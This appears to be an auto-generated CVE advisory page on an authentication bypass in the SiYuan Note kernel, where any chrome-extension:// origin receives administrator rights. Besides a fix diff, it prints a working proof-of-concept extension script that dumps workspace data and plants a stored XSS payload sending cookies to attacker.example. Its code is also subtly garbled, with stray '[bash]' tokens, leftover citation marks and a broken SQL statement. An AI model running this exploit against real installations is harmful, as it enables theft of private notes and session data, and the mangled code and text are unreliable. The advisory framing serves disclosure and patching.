SiYuan Note, Authentication Bypass via Origin Trust, CVE-2025-31485 (Critical) -DC-Jul2026-861

Listen to this Post

The SiYuan Note kernel HTTP server contains a critical authentication bypass vulnerability stemming from an overly permissive trust of the `chrome-extension://` origin scheme. In the `CheckAuth` middleware, defined in `kernel/model/session.go` at line 277, the code explicitly exempts all origins beginning with `chrome-extension://` from any authentication checks【1†L18-L21】. This is implemented via a simple string prefix check, meaning any extension origin, regardless of its specific ID, is granted a free pass.
Upon detecting this origin, the middleware proceeds to assign the request the highest privilege level, RoleAdministrator, at line 284 of the same file【1†L22-L23】. This effectively grants any browser extension full administrative control over the SiYuan kernel API. The situation is exacerbated by the default configuration of the desktop application. The `AccessAuthCode` field, which is intended to provide a layer of token-based security, defaults to an empty string for desktop installs (ContainerStd)【1†L24-L26】. When this field is empty, the kernel performs no token validation, leaving the API completely exposed.
The combination of these two flaws creates a severe security hole. Any Chrome or Chromium extension, even those with no special `host_permissions` declared in their manifest, can make fully authenticated admin API calls to the kernel listening on 127.0.0.1:6806【1†L5-L8】【1†L27-L28】. An attacker could exploit this by compromising a legitimate extension through a supply chain attack or by creating a malicious extension that requires zero special permissions to function. This allows for a wide range of malicious activities, including data exfiltration, stored XSS injection, and configuration tampering, all from the context of a seemingly benign browser add-on【1†L5-L8】.

DailyCVE Form

Platform: ……. SiYuan Note
Version: …….. v3.6.5 (and below)
Vulnerability :…… CWE-346 Origin Validation
Severity: ……. Critical (9.8 CVSS)
date: ………. July 10, 2026

Prediction: …… Expected August 2026

What Undercode Say: Analytics

The vulnerability is rooted in a fundamental flaw in origin-based authentication. The `CheckAuth` function in `kernel/model/session.go` uses a weak trust boundary.

Vulnerable Code Snippet:

// kernel/model/session.go
func CheckAuth(c gin.Context) {
origin := c.GetHeader("Origin")
if strings.HasPrefix(origin, "chrome-extension://") {
// Allow chrome extension requests
// [bash]: No further validation is performed.
} else if !isValidOrigin(origin) {
c.AbortWithStatusJSON(401, gin.H{"code": -1, "msg": "invalid origin"})
return
}
// ...
c.Set("role", model.RoleAdministrator) // [bash]: Grants admin role
}

Exploit Commands and PoC:

A minimal Chrome extension with only default permissions can trigger the vulnerability. The following background script (bg.js) demonstrates the exploit:

// bg.js -- runs as chrome-extension://<id>
// No special host_permissions needed
// 1. Verify admin access
fetch('http://127.0.0.1:6806/api/system/getConf', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: '{}'
}).then(r => r.json()).then(data => {
console.log('[bash] Admin API access confirmed:', data.code === 0);
});
// 2. Exfiltrate workspace data
fetch('http://127.0.0.1:6806/api/query/sql', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ stmt: 'SELECT FROM blocks LIMIT 100' })
}).then(r => r.json()).then(data => {
console.log('[bash] Exfiltrated blocks:', data.data?.length);
});
// 3. Inject stored XSS payload into a note
fetch('http://127.0.0.1:6806/api/filetree/listDocsByPath', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ notebook: '', path: '/' })
}).then(r => r.json()).then(tree => {
const firstDoc = tree.data?.files?.[bash];
if (!firstDoc) return;
fetch('http://127.0.0.1:6806/api/block/insertBlock', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
dataType: 'markdown',
data: '<img src=x onerror="fetch(\'https://attacker.example/steal?data=\'+document.cookie)">',
parentID: firstDoc.id
})
});
});

Exploit

An attacker can exploit this vulnerability by getting a user to install a malicious Chrome extension or by compromising a legitimate one. Because the extension requires zero special permissions, it can easily bypass Chrome Web Store review processes or be distributed via social engineering【1†L30-L33】. Once installed, the extension’s background script can make arbitrary authenticated requests to the local SiYuan kernel. The `chrome-extension://` origin header is automatically sent by the browser, and the server’s flawed logic grants it `RoleAdministrator` without any token check, enabling full control over the application【1†L30-L33】.

Protection

To protect against this vulnerability, users should immediately update to a patched version of SiYuan Note once it becomes available. As a temporary mitigation, users can set a non-empty `AccessAuthCode` in the kernel configuration, although this may not be a complete solution if the configuration itself can be tampered with. The ultimate fix requires a code change to remove the blanket `chrome-extension://` allowlist and implement a proper per-session token exchange mechanism【1†L47-L57】.

Suggested Remediation (Code Patch):

a/kernel/model/session.go
+++ b/kernel/model/session.go
@@ -274,9 +274,6 @@
func CheckAuth(c gin.Context) {
origin := c.GetHeader("Origin")
- if strings.HasPrefix(origin, "chrome-extension://") {
- // Allow chrome extension requests
- } else
if !isValidOrigin(origin) {
c.AbortWithStatusJSON(401, gin.H{"code": -1, "msg": "invalid origin"})
return

Additionally, implement a secure pairing mechanism for any required extension access【1†L54-L57】.

Impact

  • Unauthenticated Admin API Access: Any installed browser extension can gain full control of the SiYuan kernel without any authentication【1†L35】.
  • Data Exfiltration: Full workspace data can be stolen via API endpoints like /api/query/sql, /api/filetree/, and /api/export/【1†L36】.
  • Stored XSS Injection: Malicious scripts can be injected into notes via admin APIs (/api/block/insertBlock, /api/attr/setBlockAttrs), leading to persistent attacks【1†L37】.
  • Configuration Tampering: Attackers can modify system settings via `/api/system/setConf` to maintain persistence or expand the attack surface【1†L38】.
  • Supply Chain Amplification: A single compromised popular Chrome extension update could silently exploit every SiYuan desktop user【1†L39】.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top